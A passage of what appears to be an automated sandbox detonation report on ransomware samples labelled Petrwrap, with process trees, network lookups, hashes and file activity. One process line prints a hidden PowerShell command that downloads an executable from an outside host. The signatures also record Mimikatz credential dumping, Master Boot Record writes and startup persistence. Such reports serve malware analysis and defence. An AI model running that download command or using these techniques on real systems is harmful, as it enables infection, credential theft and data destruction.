| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\mshta.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2104 wrote to memory of 1612 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2104 wrote to memory of 1612 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2104 wrote to memory of 1612 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2104 -ip 2104
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\51030.exe');
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 1368
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | french-cooking.com | udp |
| FR | 54.36.91.62:80 | french-cooking.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 62.91.36.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
Files
memory/1612-0-0x0000000070E6E000-0x0000000070E6F000-memory.dmp
memory/1612-1-0x00000000028A0000-0x00000000028D6000-memory.dmp
memory/1612-2-0x0000000005610000-0x0000000005C38000-memory.dmp
memory/1612-3-0x0000000070E60000-0x0000000071610000-memory.dmp
memory/1612-4-0x0000000070E60000-0x0000000071610000-memory.dmp
memory/1612-5-0x0000000005430000-0x0000000005452000-memory.dmp
memory/1612-7-0x0000000005570000-0x00000000055D6000-memory.dmp
memory/1612-6-0x0000000005500000-0x0000000005566000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y3xdy1kc.xlh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1612-17-0x0000000005D40000-0x0000000006094000-memory.dmp
memory/1612-18-0x00000000061E0000-0x00000000061FE000-memory.dmp
memory/1612-19-0x0000000006230000-0x000000000627C000-memory.dmp
memory/1612-20-0x0000000007A50000-0x00000000080CA000-memory.dmp
memory/1612-21-0x0000000006710000-0x000000000672A000-memory.dmp
memory/1612-24-0x0000000070E60000-0x0000000071610000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240508-en
Max time kernel
1797s
Max time network
1804s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe | N/A |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
Files
memory/1892-0-0x000007FEF5A0E000-0x000007FEF5A0F000-memory.dmp
memory/1892-1-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp
memory/1892-2-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp
memory/1892-3-0x0000000000F30000-0x0000000000F82000-memory.dmp
memory/1892-4-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp
memory/1892-10-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp
memory/1892-11-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp
memory/1892-12-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp
memory/1892-13-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win10v2004-20240508-en
Max time kernel
441s
Max time network
1163s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\out.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\out.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\out.exe
"C:\Users\Admin\AppData\Local\Temp\out.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1296 -ip 1296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 188
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1296 -ip 1296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 224
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win10v2004-20240611-en
Max time kernel
1338s
Max time network
1126s
Command Line
Signatures
Command and Scripting Interpreter: JavaScript
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6.js
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win10v2004-20240226-en
Max time kernel
1802s
Max time network
1807s
Command Line
Signatures
Mimikatz
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E659.tmp | N/A |
Reads user/profile data of web browsers
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office16\OSPP.VBS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\BackupSkip.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrome.7z | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\javafx-src.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\PushWrite.docx | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jawt.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\classfile_constants.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jvmti.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Install\{A22979E4-D188-4AF0-A888-04FE21284B11}\EDGEMITMP_19EA3.tmp\MSEDGE.PACKED.7Z | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jni.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
